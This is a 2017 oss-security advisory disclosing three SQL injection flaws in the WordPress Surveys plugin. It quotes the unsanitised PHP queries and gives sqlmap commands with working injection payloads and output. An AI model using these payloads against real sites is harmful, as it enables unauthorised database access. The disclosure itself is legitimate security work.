'[oss-security] SQL Injection in Wordpress plugin surveys v1.01.8'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] SQL Injection in Wordpress plugin surveys v1.01.8
From:       "Larry W. Cashdollar" <larry0 () me ! com>
Date:       2017-05-30 11:37:45
Message-ID: 32370AEB-2D6B-40B7-8E3B-9EC152BDDDBC () me ! com
[Download RAW message or body]

Title: SQL Injection in Wordpress plugin surveys v1.01.8
Author: Larry W. Cashdollar, @_larry0
Date: 2017-05-21
CVE-ID:[CVE-2017-1002020][CVE-2017-1002021][CVE-2017-1002022]
Download Site: https://wordpress.org/plugins/surveys/
Vendor: http://www.binnyva.com/
Vendor Notified: 2017-05-22
Vendor Contact: binnyva@gmail.com
Advisory: http://www.vapidlabs.com/advisory.php?v=193
Description: The Surveys WordPress plugin lets you add surveys to your blog. You can let the \
visitors take surveys and see the result from the admin side. Vulnerability:
CVE-2017-1002020:

The following code in survey_form.php does not sanitize $_REQUEST['action'] before placing it \
inside of an SQL query:

10:	$survey_details = $wpdb->get_row("SELECT name,description,status FROM \
{$wpdb->prefix}surveys_survey WHERE ID=$_REQUEST[survey]");

CVE-2017-1002021:

The following code in individual_responses.php does not sanitize input from $survey_id or \
$_REQUEST[result] before placing it inside of an SQL query:


  5 $survey_id = $_REQUEST['survey'];
  6 $survey_details = $wpdb->get_row("SELECT ID, name FROM {$wpdb->prefix}surveys_survey WHERE \
ID=$survey_id");  7 
  8 if(isset($_REQUEST['action']) and $_REQUEST['action'] == 'delete') {
  9         $wpdb->query("DELETE FROM {$wpdb->prefix}surveys_result_answer WHERE \
result_ID=$_REQUEST[result]");  10         $wpdb->query("DELETE FROM \
{$wpdb->prefix}surveys_result WHERE ID=$_REQUEST[result]");

CVE-2017-1002022:

In questions.php $_REQUEST[survey] is injectable as it is passed directly into the SQL \
statement: 94 $all_question = $wpdb->get_results("SELECT Q.ID,Q.question,(SELECT COUNT(*) FROM \
{$wpdb->prefix}surveys_answer WHERE question_id=Q.ID) AS answer_count  95                       \
FROM {$wpdb->prefix}surveys_question AS Q  96                                                   \
WHERE Q.survey_id=$_REQUEST[survey]");


Exploit Code:
	• $ sqlmap -u 'http://192.168.0.169/wordpress/wp-admin/edit.php?page=surveys%2Fsurvey_form.php&survey=*&action=edit' \
--dbms mysql  --level 1 --risk 1 --load-cookies=./cookies.txt  •  
	•  
	• [22:45:22] [INFO] URI parameter '#1*' is 'MySQL UNION query (random number) - 1 to 20 \
columns' injectable  • URI parameter '#1*' is vulnerable. Do you want to keep testing the \
others (if any)? [y/N]   • sqlmap identified the following injection point(s) with a total of \
1913 HTTP(s) requests:  • ---
	• Parameter: #1* (URI)
	•     Type: error-based
	•     Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
	•     Payload: http://192.168.0.169:80/wordpress/wp-admin/edit.php?page=surveys/survey_form.php&survey=(SELECT \
8079 FROM(SELECT COUNT(*),CONCAT(0x7162767171,(SELECT \
(ELT(8079=8079,1))),0x71706b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS \
GROUP BY x)a)&action=edit  •  
	•     Type: AND/OR time-based blind
	•     Title: MySQL >= 5.0.12 time-based blind - Parameter replace
	•     Payload: http://192.168.0.169:80/wordpress/wp-admin/edit.php?page=surveys/survey_form.php&survey=(CASE \
WHEN (5824=5824) THEN SLEEP(5) ELSE 5824 END)&action=edit  •  
	•     Type: UNION query
	•     Title: MySQL UNION query (random number) - 3 columns
	•     Payload: http://192.168.0.169:80/wordpress/wp-admin/edit.php?page=surveys/survey_form.php&survey=-3195 \
UNION ALL SELECT 1509,CONCAT(0x7162767171,0x49776a5a4456614e5446634579746a735757586f66776e5145566a776c45797256735a4d476f7170,0x71706b7171),1509#&action=edit
  • ---
	• [22:45:25] [INFO] the back-end DBMS is MySQL
	• web server operating system: Linux Ubuntu 16.04 (xenial)
	• web application technology: Apache 2.4.18
	• back-end DBMS: MySQL >= 5.0
	• [22:45:25] [INFO] fetched data logged to text files under \
'/home/larry/.sqlmap/output/192.168.0.169'  •  
	• [*] shutting down at 22:45:25
	•  
	•  
	• $ sqlmap -u 'http://example.com/wordpress/wp-admin/edit.php?page=surveys%2Fquestion.php&survey=*' \
--dbms mysql  --level 3 --risk 3 --load-cookies=./cookies.txt  •  
	• [14:12:16] [INFO] URI parameter '#1*' is 'Generic UNION query (random number) - 1 to 20 \
columns' injectable  • URI parameter '#1*' is vulnerable. Do you want to keep testing the \
others (if any)? [y/N]   • sqlmap identified the following injection point(s) with a total of \
1252 HTTP(s) requests:  • ---
	• Parameter: #1* (URI)
	•     Type: AND/OR time-based blind
	•     Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
	•     Payload: http://example.com:80/wordpress/wp-admin/edit.php?page=surveys/question.php&survey=(SELECT \
* FROM (SELECT(SLEEP(5)))rwrG)  •  
	•     Type: UNION query
	•     Title: Generic UNION query (random number) - 3 columns
	•     Payload: http://example.com:80/wordpress/wp-admin/edit.php?page=surveys/question.php&survey=-3214 \
UNION ALL SELECT CONCAT(0x716b787671,0x5464416c58704b4b44675145455a565a61594371676143554e705851457371584b75427a5641666d,0x7178627871),7176,7176-- \
yWXG  • ---
	• [14:12:18] [INFO] the back-end DBMS is MySQL
	• web server operating system: Linux Ubuntu 16.04 (xenial)
	• web application technology: Apache 2.4.18
	• back-end DBMS: MySQL >= 5.0.12
	• [14:12:18] [INFO] fetched data logged to text files under \
'/home/larry/.sqlmap/output/example.com'  •  
	• [*] shutting down at 14:12:18=


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic